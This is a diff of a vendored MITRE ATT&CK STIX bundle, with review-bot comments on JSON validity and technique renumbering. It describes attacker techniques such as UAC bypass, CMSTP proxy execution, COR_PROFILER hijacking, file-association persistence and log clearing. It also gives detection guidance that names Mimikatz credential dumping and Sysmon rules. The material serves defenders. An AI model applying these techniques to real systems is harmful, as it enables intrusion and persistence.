+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.",
"x_mitre_data_sources": [
"API monitoring",
"File monitoring",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Mike Kemmerer"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8",
@@ -2715,10 +2691,16 @@
],
"modified": "2020-03-25T23:36:30.565Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Justin Warner, ICEBRG"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.",
"x_mitre_data_sources": [
"Windows Registry",
"File monitoring",
@@ -2726,21 +2708,16 @@
"Process monitoring",
"Browser extensions"
],
- "x_mitre_detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Justin Warner, ICEBRG"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Brute Force",
+ "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -2753,10 +2730,9 @@
"url": "https://capec.mitre.org/data/definitions/49.html"
}
],
- "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.",
- "name": "Brute Force",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -2764,7 +2740,7 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-29T20:35:55.382Z",
+ "modified": "2020-07-09T17:01:18.302Z",
"created": "2017-05-31T21:31:22.767Z",
"x_mitre_platforms": [
"Linux",
@@ -2792,6 +2768,13 @@
"x_mitre_is_subtechnique": false
},
{
+ "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. 
Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
+ "name": "Bypass User Access Control",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
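Review bot: The new-side `description` of the Bypass User Access Control object is broken across two physical lines between `list of bypasses. ` and `Additional bypass methods`, i.e. the string contains a raw line-break character; the removed side has the same break, so the commit carries it forward. If that character is a bare LF the document is not valid JSON (control characters must be escaped inside strings); if it is U+2028/U+2029 it parses, but is known to break JavaScript consumers that embed the text inside a script element. Replace it with a space or an escaped `\n` (the rest of the description already uses `\n\n` for paragraph breaks), ideally in the upstream export so it does not come back on the next refresh. I can't tell from the diff which code point it is, so check the bytes before changing it.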
@@ -2849,13 +2832,6 @@
"source_name": "enigma0x3 sdclt bypass"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Bypass User Access Control",
- "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. 
Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
- "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -2867,7 +2843,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T12:11:48.618Z",
+ "modified": "2020-06-25T19:57:54.510Z",
"created": "2020-01-30T14:24:34.977Z",
"x_mitre_platforms": [
"Windows"
@@ -3048,7 +3024,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "CMSTP",
- "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
+ "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
"id": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -3057,20 +3033,11 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T17:19:19.483Z",
+ "modified": "2020-06-20T22:34:03.247Z",
"created": "2020-01-23T18:27:30.656Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Application whitelisting"
+ "x_mitre_contributors": [
+ "Nik Seetharaman, Palantir",
+ "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
],
"x_mitre_data_sources": [
"Windows event logs",
@@ -3078,9 +3045,105 @@
"Process command-line parameters",
"Process monitoring"
],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).",
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1574.012",
+ "url": "https://attack.mitre.org/techniques/T1574/012"
+ },
+ {
+ "source_name": "Microsoft Profiling Mar 2017",
+ "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview",
+ "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Microsoft COR_PROFILER Feb 2013",
+ "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)",
+ "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Red Canary COR_PROFILER May 2020",
+ "url": "https://redcanary.com/blog/cor_profiler-for-persistence/",
+ "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Almond COR_PROFILER Apr 2019",
+ "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html",
+ "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "GitHub OmerYa Invisi-Shell",
+ "url": "https://github.com/OmerYa/Invisi-Shell",
+ "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "subTee .NET Profilers May 2017",
+ "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html",
+ "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "COR_PROFILER",
+ "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)",
+ "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-26T16:09:58.920Z",
+ "created": "2020-06-24T22:30:55.843Z",
+ "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.",
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
"x_mitre_contributors": [
- "Nik Seetharaman, Palantir",
- "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
+ "Jesse Brown, Red Canary"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
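Review bot: The `x_mitre_defense_bypassed` value for CMSTP changes from `Application whitelisting` (removed in the preceding hunk `@@ -3057,20 +3033,11 @@`) to `Application control`, and the same object's `description` now reads `application control defenses`; any local script, index or documentation that matches on the old string would silently stop matching, so it is worth searching the repository for `Application whitelisting` in the same change. The new COR_PROFILER object's `description` also carries the upstream typo `profiliers`; since this bundle is a vendored copy, that is better reported upstream than patched here. Both observations are inferred from the visible strings only — the consumers are not in the diff.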
@@ -3127,22 +3190,22 @@
],
"modified": "2020-03-24T20:41:08.996Z",
"created": "2020-02-21T15:42:25.991Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
"x_mitre_data_sources": [
"PowerShell logs",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -3186,6 +3249,26 @@
"created": "2017-05-31T21:30:42.222Z"
},
{
+ "created": "2020-01-24T13:40:47.282Z",
+ "modified": "2020-01-24T13:40:47.282Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c",
+ "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)",
+ "name": "Change Default File Association",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -3218,26 +3301,6 @@
"source_name": "TrendMicro TROJ-FAKEAV OCT 2012"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Change Default File Association",
- "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)",
- "id": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- }
- ],
- "modified": "2020-01-24T13:40:47.282Z",
- "created": "2020-01-24T13:40:47.282Z",
"x_mitre_platforms": [
"Windows"
],
@@ -3278,8 +3341,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.003",
- "url": "https://attack.mitre.org/techniques/T1551/003"
+ "external_id": "T1070.003",
+ "url": "https://attack.mitre.org/techniques/T1070/003"
}
],
"object_marking_refs": [
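Review bot: The `external_id` and `url` of this sub-technique change from T1551.003 to T1070.003 while the object's STIX `id` is unchanged, and the same renumbering appears in the next two hunks for `.002` and `.001`; anything in this repository that keys on the old `T1551.*` external IDs rather than on the STIX `id` will silently stop matching after this update. Since this file appears to be a vendored upstream bundle, the fix is not here but in whatever maps tests or indexes to technique IDs — that mapping should be grepped for `T1551` before merging, or the old IDs should be listed as aliases if the mapping supports them. A consumer that builds lookups from `external_id` would also benefit from a check that every referenced ID still resolves in the new bundle, so a future renumbering fails loudly instead of dropping coverage.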
@@ -3298,31 +3361,31 @@
],
"modified": "2020-03-29T21:31:03.043Z",
"created": "2020-01-31T12:32:08.228Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_data_sources": [
- "File monitoring",
- "Authentication logs"
- ],
- "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the ~/.bash_history file are indicators of suspicious activity.",
"x_mitre_defense_bypassed": [
"Host forensic analysis",
"Log analysis"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the ~/.bash_history file are indicators of suspicious activity.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Authentication logs"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.002",
- "url": "https://attack.mitre.org/techniques/T1551/002"
+ "external_id": "T1070.002",
+ "url": "https://attack.mitre.org/techniques/T1070/002"
},
{
"source_name": "Linux Logs",
@@ -3346,25 +3409,25 @@
],
"modified": "2020-03-29T21:23:51.886Z",
"created": "2020-01-28T17:11:54.034Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.001",
- "url": "https://attack.mitre.org/techniques/T1551/001"
+ "external_id": "T1070.001",
+ "url": "https://attack.mitre.org/techniques/T1070/001"
},
{
"url": "https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil",
@@ -3398,29 +3461,29 @@
],
"modified": "2020-03-29T21:17:03.732Z",
"created": "2020-01-28T17:05:14.707Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_data_sources": [
- "API monitoring",
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Clearing the Windows event logs requires Administrator permissions"
],
"x_mitre_defense_bypassed": [
"Anti Virus",
